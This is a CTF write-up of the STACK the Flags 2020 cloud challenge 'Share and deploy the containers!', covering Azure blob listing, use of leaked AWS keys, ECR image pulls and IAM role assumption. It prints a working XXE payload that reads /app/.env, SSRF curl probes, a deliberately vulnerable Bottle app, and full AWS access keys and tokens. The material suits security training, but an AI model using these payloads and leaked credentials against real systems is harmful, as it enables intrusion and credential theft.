RY_SIZE=128\n_=/usr/bin/env\n3.141592653589793"}

Note: The -w 0 argument to the base64 command is required to disable line-wrapping, which would otherwise introduce newlines into the payload.

Awesome! We found the flag environment variable set to St4g1nG_EnV_I5_th3_W34k3$t_Link, and we can get the final flag by wrapping it in the flag format:

govtech-csg{St4g1nG_EnV_I5_th3_W34k3$t_Link}

Last weekend, I participated in STACK the Flags 2020 CTF organized by Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG). In this write-up, I will be discussing one of the cloud challenges with no solves – Share and deploy the containers!.

I was extremely close to solving this particular challenge during the competition, but there were some hiccups along the way and I didn’t manage to solve it within the time limit. :cold_sweat:

In retrospect, the Share and deploy the containers! cloud challenge is…

  • Difficult to solve,
  • Time-consuming to solve,
  • Confusing if you don’t understand what the various cloud services are and how they are being used,
  • Messy if you did not properly keep track of the details while working on the challenge (the sheer amount of information is overwhelming),
  • Built on common vulnerabilities while highlighting several bad coding practices,
  • Quite well-created despite having some bugs which hindered my progress greatly,
  • Relevant to and reflective of real-world cloud penetration testing (it’s tedious and challenging!)

Overall, it was really fun solving this challenge. Kudos to Tan Kee Hock from GovTech’s CSG for creating this amazing challenge!

Share and deploy the containers!

Description:
An agent reportedly working for COViD has been arrested. In his work laptop, we discovered a note from the agent’s laptop. The note contains a warning message from COViD to him! Can you help to investigate what are the applications the captured agent was developing and what vulnerabilities they are purposefully injecting into the applications?

Discovered Note:
https://secretchannel.blob.core.windows.net/covid-channel/notes-from-covid.txt

Introduction

The note at https://secretchannel.blob.core.windows.net/covid-channel/notes-from-covid.txt has the following content:

Agent 007895421,

COViD wants you to inject vulnerabilities in projects that you are working on. Previously you reported that you are working on two projects the upcoming National Pension Records System (NPRS). Please inject vulnerabilities in the two applications.

Regards,
Handler X

From the note, we now learn that there are two projects in the upcoming National Pension Records System (NPRS) which contain some injected vulnerabilities.

It’s not immediately clear what the final objective of this challenge is, but let’s just proceed regardless.

Finding Hidden Azure Blobs

Notice that the URL of the note is in the format http://<storage-account>.blob.core.windows.net/<container>/<blob>, which indicates that the note is stored on Azure Blob storage. If you are unfamiliar with Azure Blob storage, do check out the documentation for Azure Blob storage.

Basically, using Azure Blob storage, one can store blobs (files) in containers (directories) in their storage account (similar to Amazon S3 buckets or Google Cloud Storage buckets). In other words, by examining the Azure Blob URL again, we can deduce that the storage account name is secretchannel, the container name is covid-channel and the blob name is notes-from-covid.txt.

Using the Azure Storage REST API, we can fetch additional information about the storage account. I first attempted to list all containers in the storage account by visiting https://secretchannel.blob.core.windows.net/?comp=list, but a ResourceNotFound error is returned, indicating that a public user does not have sufficient privileges to list containers. I then tried to list all blobs in the covid-channel container by visiting https://secretchannel.blob.core.windows.net/covid-channel/?restype=container&comp=list&include=metadata, and the following XML response is returned:

<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ContainerName="https://secretchannel.blob.core.windows.net/covid-channel/">
    <Blobs>
        <Blob>
            <Name>notes-from-covid.txt</Name>
            <Url>https://secretchannel.blob.core.windows.net/covid-channel/notes-from-covid.txt</Url>
            <Properties>
                <Last-Modified>Thu, 19 Nov 2020 10:14:22 GMT</Last-Modified>
                <Etag>0x8D88C73E2D218F9</Etag>
                <Content-Length>285</Content-Length>
                <Content-Type>text/plain</Content-Type>
                <Content-Encoding />
                <Content-Language />
                <Content-MD5>oGU6sX8DewYhX0MDzxGyKg==</Content-MD5>
                <Cache-Control />
                <BlobType>BlockBlob</BlobType>
                <LeaseStatus>unlocked</LeaseStatus>
            </Properties>
            <Metadata />
        </Blob>
        <Blob>
            <Name>project-data.txt</Name>
            <Url>https://secretchannel.blob.core.windows.net/covid-channel/project-data.txt</Url>
            <Properties>
                <Last-Modified>Wed, 02 Dec 2020 16:53:44 GMT</Last-Modified>
                <Etag>0x8D896E2D456CDFD</Etag>
                <Content-Length>385</Content-Length>
                <Content-Type>text/plain</Content-Type>
                <Content-Encoding />
                <Content-Language />
                <Content-MD5>jVr3QLDwS/WlRVCQ0034HQ==</Content-MD5>
                <Cache-Control />
                <BlobType>BlockBlob</BlobType>
                <LeaseStatus>unlocked</LeaseStatus>
            </Properties>
            <Metadata />
        </Blob>
    </Blobs>
    <NextMarker />
</EnumerationResults>

Nice! It appears that public users are permitted to list blobs in the covid-channel container, allowing us to find a hidden blob (project-data.txt) within.
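
For reference, the same blob listing can also be retrieved from the command line:

$ curl 'https://secretchannel.blob.core.windows.net/covid-channel/?restype=container&comp=list&include=metadata'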

Note: You can also discover and fetch the hidden blob using the AzCopy tool instead:

$ ./azcopy cp 'https://secretchannel.blob.core.windows.net/covid-channel/' . --recursive
INFO: Scanning...
INFO: Any empty folders will not be processed, because source and/or destination doesn't have full folder support

Job 8c7b23b9-bfb4-6b97-7e1d-025d3d1d71b8 has started
Log file is located at: /home/cloud/.azcopy/8c7b23b9-bfb4-6b97-7e1d-025d3d1d71b8.log

0.0 %, 0 Done, 0 Failed, 2 Pending, 0 Skipped, 2 Total,


Job 8c7b23b9-bfb4-6b97-7e1d-025d3d1d71b8 summary
Elapsed Time (Minutes): 0.0333
Number of File Transfers: 2
Number of Folder Property Transfers: 0
Total Number of Transfers: 2
Number of Transfers Completed: 2
Number of Transfers Failed: 0
Number of Transfers Skipped: 0
TotalBytesTransferred: 670
Final Job Status: Completed

$ ls -al covid-channel/
total 16
drwxrwxr-x  2 cloud cloud 4096 Dec  8 08:10 .
drwxrwxr-x 10 cloud cloud 4096 Dec  8 08:10 ..
-rw-r--r--  1 cloud cloud  285 Dec  8 08:10 notes-from-covid.txt
-rw-r--r--  1 cloud cloud  385 Dec  8 08:10 project-data.txt

Bye Azure, Hello Amazon Web Services!

Viewing the hidden blob at https://secretchannel.blob.core.windows.net/covid-channel/project-data.txt returns the following contents:

National Pension Records System (NPRS)
* Inject the vulnerabilities in the two NPRS sub-systems.
(Employee Pension Contribution Upload Form and National Pension Registry)
Containers are uploaded.
---> To provide update to Handler X

Generated a set of credentials for the handler to check the work.
-- Access Credentials --
AKIAU65ZHERXMQX442VZ
2mA8r/iVXcb75dbYUQCrqd70CLwo6wjbR7zYSE0i

We can easily identify the credentials provided as a pair of AWS access credentials, since AWS access key IDs start with either AKIA (for long-term credentials) or ASIA (for temporary credentials).

Furthermore, we now learn that NPRS contains two sub-systems, namely the Employee Pension Contribution Upload Form and the National Pension Registry. It is also mentioned that containers are uploaded, which suggests that Docker, Amazon Elastic Container Service (ECS) or Amazon Elastic Container Registry (ECR) may be used.

Before we continue on, here’s a quick overview of the attack path so far: Initial Entrypoint Progress

Enumerating NPRS Handler

To enumerate the actions permitted using the access credentials obtained, I used WeirdAAL (AWS Attack Library). Do follow the setup guide carefully and configure the AWS keypair. Then, run the recon module of WeirdAAL to let it enumerate the AWS services and identify which ones the user has permission to use.

$ cat .env
[default]
aws_access_key_id=AKIAU65ZHERXMQX442VZ
aws_secret_access_key=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

$ python3 weirdAAL.py -m recon_all -t nprs-handler
Account Id: 341301470318
AKIAU65ZHERXMQX442VZ : Is NOT a root key
...

$ python3 weirdAAL.py -m list_services_by_key -t nprs-handler
[+] Services enumerated for AKIAU65ZHERXMQX442VZ [+]
ec2.DescribeInstances
ec2.DescribeSecurityGroups
ecr.DescribeRepositories
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
elb.DescribeLoadBalancers
elbv2.DescribeLoadBalancers
opsworks.DescribeStacks
route53.ListGeoLocations
sts.GetCallerIdentity

The above output lists the services and the actions the user is permitted to invoke (e.g. describe-instances for the ec2 service).
For convenience, I also installed and used AWS CLI version 1 to invoke the permitted actions listed above after importing the credentials.

Note: If you are using AWS CLI v2, note that your results may vary due to breaking changes from AWS CLI v1 to v2.

$ pip3 install awscli --upgrade --user

$ aws configure --profile nprs-handler
AWS Access Key ID [None]: AKIAU65ZHERXMQX442VZ
AWS Secret Access Key [None]: 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
Default region name [None]: ap-southeast-1
Default output format [None]:

$ aws sts get-caller-identity --profile nprs-handler
{
    "UserId": "AIDAU65ZHERXD5V25EJ4W",
    "Account": "341301470318",
    "Arn": "arn:aws:iam::341301470318:user/nprs-handler"
}

We can see that it is possible to fetch details about the AWS IAM user nprs-handler in account 341301470318.

Pulling Images from Amazon ECR

Recall that earlier on, we noted the use of containers. If Amazon Elastic Container Registry (ECR) is used, then perhaps we can connect to the ECR and pull the Docker images of the two subsystems!

Using AWS CLI, we can list all repositories in the ECR:

$ aws ecr describe-repositories --profile nprs-handler
{
    "repositories": [
        {
            "repositoryArn": "arn:aws:ecr:ap-southeast-1:341301470318:repository/national-pension-registry",
            "registryId": "341301470318",
            "repositoryName": "national-pension-registry",
            "repositoryUri": "341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry",
            "createdAt": 1606621276.0,
            "imageTagMutability": "MUTABLE",
            "imageScanningConfiguration": {
                "scanOnPush": false
            },
            "encryptionConfiguration": {
                "encryptionType": "AES256"
            }
        },
        {
            "repositoryArn": "arn:aws:ecr:ap-southeast-1:341301470318:repository/employee-pension-contribution-upload-form",
            "registryId": "341301470318",
            "repositoryName": "employee-pension-contribution-upload-form",
            "repositoryUri": "341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form",
            "createdAt": 1606592582.0,
            "imageTagMutability": "MUTABLE",
            "imageScanningConfiguration": {
                "scanOnPush": false
            },
            "encryptionConfiguration": {
                "encryptionType": "AES256"
            }
        }
    ]
}

Great! We can list the image repositories in the Amazon ECR. Following the instructions in the documentation for Amazon ECR registries, we can log in to the Amazon ECR successfully:

$ aws ecr get-login-password --profile nprs-handler --region ap-southeast-1 | docker login --username AWS --password-stdin 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com
WARNING! Your password will be stored unencrypted in /home/cloud/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded

Now that we have logged in to the Amazon ECR successfully, we can pull the images for both applications from the Amazon ECR and analyse the Docker images later on.

$ docker pull 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry:latest
latest: Pulling from national-pension-registry
...
Digest: sha256:fa88b76707f653863d9fbc5c3d8d9cf29ef7479faf14308716d90f1ddca5a276
Status: Downloaded newer image for 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry:latest
341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry:latest

$ docker pull 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form:latest
...
Digest: sha256:609300f7a12939d4a44ed751d03be1f61d4580e685bfc9071da4da1f73af44d8
Status: Downloaded newer image for 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form:latest
341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form:latest

Listing Load Balancers & Accessing Contribution Upload Form Web App

Besides being able to access the Amazon ECR, we can also invoke elbv2.DescribeLoadBalancers to enumerate the Elastic Load Balancing (ELB) deployments:

$ aws elbv2 describe-load-balancers --profile nprs-handler
{
    "LoadBalancers": [
        {
            "LoadBalancerArn": "arn:aws:elasticloadbalancing:ap-southeast-1:341301470318:loadbalancer/app/epcuf-cluster-alb/a885789784808790",
            "DNSName": "epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com",
            "CanonicalHostedZoneId": "Z1LMS91P8CMLE5",
            "CreatedTime": "2020-11-29T05:15:27.400Z",
            "LoadBalancerName": "epcuf-cluster-alb",
            "Scheme": "internet-facing",
            "VpcId": "vpc-0edcd7648f616c0eb",
            "State": {
                "Code": "active"
            },
            "Type": "application",
            "AvailabilityZones": [
                {
                    "ZoneName": "ap-southeast-1b",
                    "SubnetId": "subnet-00cf0266992d1a87b",
                    "LoadBalancerAddresses": []
                },
                {
                    "ZoneName": "ap-southeast-1a",
                    "SubnetId": "subnet-0823515e3019418aa",
                    "LoadBalancerAddresses": []
                }
            ],
            "SecurityGroups": [
                "sg-0a35432455c0dcbd8"
            ],
            "IpAddressType": "ipv4"
        }
    ]
}

From the Amazon Resource Name (ARN) of the only load balancer deployed, we can easily identify that it is an Application Load Balancer (ALB) by referencing the documentation for Elastic Load Balancing. The ALB is accessible at http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com, and visiting it brings us to the web application for the Employee Pension Contribution Upload Form: Employee Pension Contribution Upload Form

Clicking on the Sample document link on the contribution upload form returns a 404 Not Found error page, so we likely need to investigate the Docker image for this application to understand its functionality and hopefully discover some vulnerabilities in the web application.

Analysing Docker Image for Contribution Upload Form

To examine the filesystem of the Docker image, we can simply run the Docker image in a container and execute an interactive shell session in the container:

$ sudo docker run -it 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form /bin/bash
root@<container-id>:/app# ls -alR
.:
total 20
drwxr-xr-x 1 root root 4096 Nov 28 19:45 .
drwxr-xr-x 1 root root 4096 Dec  8 18:37 ..
-rw-r--r-- 1 root root 2735 Nov 28 19:41 app.py
drwxr-xr-x 2 root root 4096 Nov 22 23:12 files
drwxr-xr-x 3 root root 4096 Nov 22 23:12 views

./files:
total 12
drwxr-xr-x 2 root root 4096 Nov 22 23:12 .
drwxr-xr-x 1 root root 4096 Nov 28 19:45 ..
-rw-r--r-- 1 root root  580 Nov 22 23:12 sample-data.xml

...

The source code for /app/app.py is shown below:

from bottle import run, request, post, Bottle, template, static_file
from lxml import etree as etree
import pathlib
import requests
import os

# Will deploy to ECS Cluster hosted on EC2

# Todo: Database Integration
# Database and other relevant credentials will be loaded via the environment file
# Tentative location /app/.env
# For now, just dump all evnironment variables to .env file
env_output = ""
for k, v in os.environ.items():
    env_output += k + "=" + v + "\n"
output_env_file = open(".env", "w")
output_env_file.write(env_output)
output_env_file.close()

current_directory = str(pathlib.Path().absolute())
parser = etree.XMLParser(no_network=False)
app = Bottle()

@app.route('/download/<filename:path>')
def download(filename):
    return static_file(filename, root=current_directory + '/static/files', download=filename)

@app.route('/import',  method='POST')
def import_submission():
    postdata = request.body.read()
    file_name = request.forms.get("xml-data-file")
    data = request.files.get("xml-data-file")
    raw = data.file.read()
    # TODO: validation
    root = etree.fromstring(raw,parser)
    # TODO: save to database
    total = 0
    for contribution in root[0][2]:
        total += int(contribution.text)
    employee = {
        'first_name': root[0][0].text,
        'last_name': root[0][1].text,
        'total_contribution': total
    }
    return template('submission', employee)

# TODO: Webhook for successful import
# Webhook will be used by third party applications.
# Endpoint is not fixed yet, still in staging.
# The other project's development is experiencing delay.

# National Pension Registry is another internal network.
# The machine running this application will have to get the IP whitelisted
# Do check with the NPR dev team on the ip whitelisting

@app.route('/authenticate',  method='POST')
def register():
    endpoint = request.forms.get('endpoint')
    # Endpoint Validation
    username = request.forms.get('username')
    password = request.forms.get('password')
    data = {'username': username, 'password': password}
    res = requests.post(endpoint, data = data)
    return res.text

@app.route('/report',  method='POST')
def submit():
    endpoint = request.forms.get('endpoint')
    # Endpoint Validation
    token = request.forms.get('token')
    usage = request.forms.get('usage')
    contributor_id = request.forms.get('contributor_id')
    constructed_endpoint = endpoint + "?usage=" + usage + "&contributor_id=" + contributor_id
    res = requests.get(constructed_endpoint, headers={'Authorization': 'Bearer ' + token})
    return res.text

@app.route('/',  method='GET')
def index():
    return template('index')

run(app, host='0.0.0.0', port=80, debug=True)

Clearly, the code is very badly written – it’s an amalgamation of numerous bad coding practices found too often :(
Several observations can be made here:

  • The application dumps all environment variables containing “database and other relevant credentials” to /app/.env
  • The XML parser (lxml) is explicitly configured to allow network access (no_network=False)
  • The /import POST endpoint is vulnerable to XML External Entity (XXE) attacks (the XML parser resolves external entities by default), allowing for GET-based Server-Side Request Forgery (SSRF) attacks and arbitrary file disclosure
  • The /authenticate POST endpoint allows for POST-based SSRF using the endpoint, username and password parameters
  • The /report POST endpoint allows for GET-based SSRF using the endpoint, usage and contributor_id parameters
  • Debug mode is enabled (debug=True) on the Bottle application, which leaks verbose error output
  • The other sub-system, the National Pension Registry, resides in another internal network
  • There are IP whitelisting checks performed by the National Pension Registry application

At this point, we can attempt to guess the IP address or hostname of the National Pension Registry sub-system and use the SSRF vulnerabilities to access the other application. Unfortunately, a coding flaw causes the application to crash too easily, making it difficult to execute this strategy successfully.
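
For illustration, a blind probe through the /authenticate SSRF endpoint might look like the following, with the internal IP address being pure guesswork:

$ curl -X POST 'http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com/authenticate' \
    --data-urlencode 'endpoint=http://10.0.0.1/authenticate' \
    --data-urlencode 'username=guest' \
    --data-urlencode 'password=guest'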

Exploiting XXE to Disclose /app/.env & Obtain AWS IAM Keys

Looking at the possible vulnerabilities to be exploited, we see that we are able to use XXE to read /app/.env to obtain environment variables which may contain “database and other relevant credentials”.

For convenience, we can use the sample document at /app/files/sample-data.xml:

<?xml version="1.0" encoding="ISO-8859-1"?>
<employees>
    <employee>
        <firstname>John</firstname>
        <lastname>Doe</lastname>
        <contributions>
            <january>215</january>
            <february>215</february>
            <march>215</march>
            <april>215</april>
            <may>215</may>
            <june>215</june>
            <july>215</july>
            <august>215</august>
            <september>215</september>
            <october>215</october>
            <november>215</november>
        </contributions>
    </employee>
</employees>

Then, we modify it to include an XXE payload in the firstname field as such:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///app/.env">]>
<employees>
    <employee>
        <firstname>&xxe;</firstname>
        <lastname>Doe</lastname>
        <contributions>
            <january>215</january>
            <february>215</february>
            <march>215</march>
            <april>215</april>
            <may>215</may>
            <june>215</june>
            <july>215</july>
            <august>215</august>
            <september>215</september>
            <october>215</october>
            <november>215</november>
        </contributions>
    </employee>
</employees>

After that, we upload it using the Employee Pension Contribution Upload Form, and the file contents of /app/.env will be returned after Full Name: in the response: XXE Response
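
Equivalently, the upload can be scripted with curl; the xml-data-file form field name comes from app.py, and payload.xml here is a placeholder for our modified sample document:

$ curl -X POST 'http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com/import' \
    -F 'xml-data-file=@payload.xml'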

And we discover the long-term credentials for nprs-cross-handler! :smile:
We have now completed half the challenge :scream:, so let’s pause for a minute and take a quick look at our progress thus far before continuing on: Midpoint of Attack Path

Enumerating NPRS Cross Handler

Let’s reconfigure WeirdAAL and the AWS CLI to use the new credentials we just obtained for nprs-cross-handler, then re-run the recon module of WeirdAAL and list all permitted actions.

$ aws configure --profile nprs-cross-handler
AWS Access Key ID [None]: AKIAU65ZHERXDDIVSXPO
AWS Secret Access Key [None]: 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
Default region name [None]: ap-southeast-1
Default output format [None]:

$ cat .env
[default]
aws_access_key_id = AKIAU65ZHERXDDIVSXPO
aws_secret_access_key = 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

$ python3 weirdAAL.py -m recon_all -t nprs-cross-handler
Account Id: 341301470318
AKIAU65ZHERXDDIVSXPO : Is NOT a root key
...

$ python3 weirdAAL.py -m list_services_by_key -t nprs-cross-handler
[+] Services enumerated for AKIAU65ZHERXDDIVSXPO [+]
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
opsworks.DescribeStacks
route53.ListGeoLocations
sts.GetCallerIdentity

We invoked the accessible actions listed above using the AWS CLI, but found nothing interesting.

Since the automated enumeration did not work well, it is time to fall back to manual enumeration.
I got stuck here during the competition even though I already knew how to get the flag at this point (I just needed the IP address or hostname of the National Pension Registry sub-system) and had done everything below, but I obtained different results from what I should have been seeing. Perhaps I enumerated using the wrong IAM keys; I honestly don’t know. In hindsight, better note-taking and removing unused credentials from ~/.aws/credentials could have helped to avoid such an outcome.

Moving on, we enumerate the policies attached to the user nprs-cross-handler to determine what privileges the user has. There are two primary types of identity-based policies, namely Managed Policies and Inline Policies. Basically, a Managed Policy can be attached to multiple IAM identities (users, groups or roles), whereas an Inline Policy is embedded in, and applies to, a single identity only.

To enumerate Inline Policies, we can use the aws iam list-user-policies command:

$ aws iam list-user-policies --user-name nprs-cross-handler --profile nprs-cross-handler

An error occurred (AccessDenied) when calling the ListUserPolicies operation: User: arn:aws:iam::341301470318:user/nprs-cross-handler is not authorized to perform: iam:ListUserPolicies on resource: user nprs-cross-handler

Nope. Let’s enumerate Managed Policies next using the aws iam list-attached-user-policies command:

$ aws iam list-attached-user-policies --user-name nprs-cross-handler
{
    "AttachedPolicies": [
        {
            "PolicyName": "nprs-cross-handler-policy",
            "PolicyArn": "arn:aws:iam::341301470318:policy/nprs-cross-handler-policy"
        }
    ]
}

Seems like there is a managed policy nprs-cross-handler-policy attached to the nprs-cross-handler user.
Let’s retrieve more information about the managed policy discovered.

Note: It’s also a good idea to enumerate all versions of the policies, but since v1 of nprs-cross-handler-policy is irrelevant for this challenge, I will be omitting it for brevity.

$ aws iam get-policy --policy-arn 'arn:aws:iam::341301470318:policy/nprs-cross-handler-policy' --profile nprs-cross-handler
{
    "Policy": {
        "PolicyName": "nprs-cross-handler-policy",
        "PolicyId": "ANPAU65ZHERXBFWDQBCMX",
        "Arn": "arn:aws:iam::341301470318:policy/nprs-cross-handler-policy",
        "Path": "/",
        "DefaultVersionId": "v2",
        "AttachmentCount": 1,
        "PermissionsBoundaryUsageCount": 0,
        "IsAttachable": true,
        "CreateDate": "2020-11-19T01:46:50Z",
        "UpdateDate": "2020-11-29T08:27:10Z"
    }
}

$ aws iam get-policy-version --policy-arn 'arn:aws:iam::341301470318:policy/nprs-cross-handler-policy' --version-id v2 --profile nprs-cross-handler
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "VisualEditor0",
                    "Effect": "Allow",
                    "Action": "iam:ListAttachedUserPolicies",
                    "Resource": "arn:aws:iam::341301470318:user/*"
                },
                {
                    "Sid": "VisualEditor1",
                    "Effect": "Allow",
                    "Action": [
                        "iam:GetPolicy",
                        "iam:GetPolicyVersion"
                    ],
                    "Resource": "arn:aws:iam::341301470318:policy/*"
                },
                {
                    "Sid": "VisualEditor2",
                    "Effect": "Allow",
                    "Action": "sts:AssumeRole",
                    "Resource": "arn:aws:iam::628769934365:role/cross-account-ec2-access"
                }
            ]
        },
        "VersionId": "v2",
        "IsDefaultVersion": true,
        "CreateDate": "2020-11-29T08:27:10Z"
    }
}

It looks like the attached user policy allows the nprs-cross-handler user to assume the role cross-account-ec2-access!
Let’s request temporary credentials for the assumed role using the aws sts assume-role command.

$ aws sts assume-role --role-arn 'arn:aws:iam::628769934365:role/cross-account-ec2-access' --role-session-name session
{
    "Credentials": {
        "AccessKeyId": "ASIAZEZM3ZQOVCX7EEF4",
        "SecretAccessKey": "NgAGcf1HnpIAjrNdqv3E7XGXy1D9h5AC5IdfTAxj",
        "SessionToken": "FwoGZXIvYXdzENH//////////wEaDHejxi0VSza/b+hi/yKrAYDc6cpf8NeBGGCCXVy6RKbQCvQBVt/OY+97yMxP6oKaMpQWMM4L7vxB3KlLBFLkVM5TEbXZutQrmmGQlFQV1nRSHHk902qTgRGFvewf8yoFfAKKEZZbyxWi0I8eRiaDt1Db6G6W2FyBjEqVR0bZV3DrJefEQ1LJDCNTWU1a3uy2pWu813s4hu09o3RKIAfxuXhh09zr5dK3cJ0UH0gS85Oar2qSIETW0t/NNSjF+MH+BTItGrwf4r3UciOrx8c0eXEP5AascpUy6c/jP5DRa62+tVI2uUirQz6I8OfyPKSu",
        "Expiration": "2020-12-09T08:27:01Z"
    },
    "AssumedRoleUser": {
        "AssumedRoleId": "AROAZEZM3ZQORFHAJAKYS:session",
        "Arn": "arn:aws:sts::628769934365:assumed-role/cross-account-ec2-access/session"
    }
}

Enumerating Cross Account EC2 Access Role

Now that we have temporary credentials for the cross-account-ec2-access role, let’s reconfigure WeirdAAL and the AWS CLI yet again to use the temporary credentials for the assumed role, then re-run the recon module of WeirdAAL and list all permitted actions.

$ cat ~/.aws/credentials
[cross-account-ec2-access]
aws_access_key_id=ASIAZEZM3ZQOVCX7EEF4
aws_secret_access_key=NgAGcf1HnpIAjrNdqv3E7XGXy1D9h5AC5IdfTAxj
aws_session_token=FwoGZXIvYXdzENH//////////wEaDHejxi0VSza/b+hi/yKrAYDc6cpf8NeBGGCCXVy6RKbQCvQBVt/OY+97yMxP6oKaMpQWMM4L7vxB3KlLBFLkVM5TEbXZutQrmmGQlFQV1nRSHHk902qTgRGFvewf8yoFfAKKEZZbyxWi0I8eRiaDt1Db6G6W2FyBjEqVR0bZV3DrJefEQ1LJDCNTWU1a3uy2pWu813s4hu09o3RKIAfxuXhh09zr5dK3cJ0UH0gS85Oar2qSIETW0t/NNSjF+MH+BTItGrwf4r3UciOrx8c0eXEP5AascpUy6c/jP5DRa62+tVI2uUirQz6I8OfyPKSu

$ cat .env
[default]
aws_access_key_id=ASIAZEZM3ZQOVCX7EEF4
aws_secret_access_key=NgAGcf1HnpIAjrNdqv3E7XGXy1D9h5AC5IdfTAxj
aws_session_token=FwoGZXIvYXdzENH//////////wEaDHejxi0VSza/b+hi/yKrAYDc6cpf8NeBGGCCXVy6RKbQCvQBVt/OY+97yMxP6oKaMpQWMM4L7vxB3KlLBFLkVM5TEbXZutQrmmGQlFQV1nRSHHk902qTgRGFvewf8yoFfAKKEZZbyxWi0I8eRiaDt1Db6G6W2FyBjEqVR0bZV3DrJefEQ1LJDCNTWU1a3uy2pWu813s4hu09o3RKIAfxuXhh09zr5dK3cJ0UH0gS85Oar2qSIETW0t/NNSjF+MH+BTItGrwf4r3UciOrx8c0eXEP5AascpUy6c/jP5DRa62+tVI2uUirQz6I8OfyPKSu

$ python3 weirdAAL.py -m recon_all -t cross-account-ec2-access
Account Id: 341301470318
ASIAZEZM3ZQOVCX7EEF4 : Is NOT a root key
...

$ python3 weirdAAL.py -m list_services_by_key -t cross-account-ec2-access
[+] Services enumerated for ASIAZEZM3ZQO4WFMZ3U2 [+]
ec2.DescribeAccountAttributes
ec2.DescribeAddresses
...
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
elb.DescribeLoadBalancers
elbv2.DescribeLoadBalancers
opsworks.DescribeStacks
route53.ListGeoLocations
sts.GetCallerIdentity

If we run the aws elbv2 describe-load-balancers command, we can find the npr-cluster-alb deployed for the National Pension Registry application.

$ aws elbv2 describe-load-balancers --profile cross-account-ec2-access
{
    "LoadBalancers": [
        {
            "LoadBalancerArn": "arn:aws:elasticloadbalancing:ap-southeast-1:628769934365:loadbalancer/app/npr-cluster-alb/96b0036340fbf14d",
            "DNSName": "internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com",
            "CanonicalHostedZoneId": "Z1LMS91P8CMLE5",
            "CreatedTime": "2020-11-29T04:03:22.810Z",
            "LoadBalancerName": "npr-cluster-alb",
            "Scheme": "internal",
            "VpcId": "vpc-0dcb6e571fd026058",
            "State": {
                "Code": "active"
            },
            "Type": "application",
            "AvailabilityZones": [
                {
                    "ZoneName": "ap-southeast-1b",
                    "SubnetId": "subnet-0814fe411ae20fcc7",
                    "LoadBalancerAddresses": []
                },
                {
                    "ZoneName": "ap-southeast-1a",
                    "SubnetId": "subnet-0be4fa2daa74f89dd",
                    "LoadBalancerAddresses": []
                }
            ],
            "SecurityGroups": [
                "sg-0dc2665a5ee555216"
            ],
            "IpAddressType": "ipv4"
        }
    ]
}

Notice that the DNS Name for the ALB starts with internal-, which indicates that the npr-cluster-alb is an internally-accessible ALB.

We can also verify it by querying the A records for the DNS name:

$ dig +short internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com -t A @8.8.8.8
10.1.1.173
10.1.0.170

This confirms our suspicion. Since the application is only accessible via the internal network, we probably have to leverage the SSRF vulnerabilities in the Employee Pension Contribution Upload Form application to reach the National Pension Registry application.

We are finally close to getting a flag! It is also likely that we need to exploit additional vulnerabilities in the National Pension Registry application to obtain the flag.

Here’s a quick recap of our progress before we continue on: Attack Path Reaching National Pension Registry

Analysing Docker Image for National Pension Registry

Let’s analyse the Docker image for the National Pension Registry application just like how we did for the Employee Pension Contribution Upload Form application.

$ docker run -it 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry /bin/bash
root@<container-id>:/usr/src/app# ls -al
total 72
drwxr-xr-x   1 root root  4096 Nov 29 03:43 .
drwxr-xr-x   1 root root  4096 Nov 19 01:41 ..
-rw-r--r--   1 root root  5587 Nov 28 19:41 index.js
drwxr-xr-x 120 root root  4096 Nov 19 01:41 node_modules
-rw-r--r--   1 root root 41347 Nov 16 17:56 package-lock.json
-rw-r--r--   1 root root   490 Nov 16 17:56 package.json
drwxr-xr-x   2 root root  4096 Nov 29 03:43 prod-keys
root@<container-id>:/usr/src/app# ls -al prod-keys
total 16
drwxr-xr-x 2 root root 4096 Nov 29 03:43 .
drwxr-xr-x 1 root root 4096 Nov 29 03:43 ..
-rw-r--r-- 1 root root 1674 Nov 22 23:12 prod-private-key.pem
-rw-r--r-- 1 root root  558 Nov 22 23:12 prod-public-keys.json

The source code for /usr/src/app/index.js is shown below:

const { Sequelize } = require('sequelize');
const jwt = require('jsonwebtoken');
const jwksClient = require('jwks-rsa');
const fs = require('fs');
const privateKey = fs.readFileSync('prod-keys/prod-private-key.pem');
const jku_link = "http://127.0.0.1:8333/prod-public-keys.json";
const sequelize = new Sequelize('postgres://npr-rds-read-only:<password>@<rds-instance>.ap-southeast-1.rds.amazonaws.com:5432/national_pension_records');
const express = require('express');
const bodyParser = require('body-parser');
const ipRangeCheck = require("ip-range-check");
const url = require('url');
const app = express();
